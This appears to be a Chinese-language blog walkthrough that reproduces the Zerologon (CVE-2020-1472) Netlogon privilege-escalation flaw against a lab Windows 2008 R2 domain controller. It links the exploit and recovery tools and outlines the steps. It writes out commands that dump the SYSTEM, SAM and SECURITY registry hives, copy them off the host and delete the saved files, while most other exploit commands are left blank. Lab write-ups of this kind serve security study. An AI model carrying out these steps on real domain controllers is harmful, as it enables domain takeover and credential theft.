CVE-2020-1472

时间:2022-07-25
本文章向大家介绍CVE-2020-1472,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

0x00 CVE-2020-1472复现

NetLogon 特权提升漏洞

NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

环境:

1.攻击机kali2020

2.靶机win2008r2---ip:192.168.124.141---主机名字:dc-01 ---域名:test.com

3.复现工具:https://github.com/dirkjanm/CVE-2020-1472

4.所需环境:python3+impacket包https://github.com/SecureAuthCorp/impacket

5.恢复工具:https://github.com/risksense/zerologon

0x01 复现过程

  1. 下载复现工具,进行检验

2.获取hash值

安装impacket包

需要使用如下步骤:

git clonehttps://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

在刚才下载的包里面

impacket-master/examples

获取空口令

获取hash值

3. 获取shell

4. 获取域控的原始NT哈希

先在shell中执行以下命令,获取域控账户的注册表文件

reg save HKLMSYSTEM system.save

reg save HKLMSAM sam.save

reg save HKLMSECURITY security.save

get system.save

get sam.save

get security.save

del /f system.save

del /f sam.save

del /f security.save

在执行以下命令获取原始NT哈希

0x02.恢复

恢复脚本:https://github.com/risksense/zerologon

恢复需要使用哈希使用$MACHINE.ACC: 后的参数

随机文章
本站知识点必读
最近更新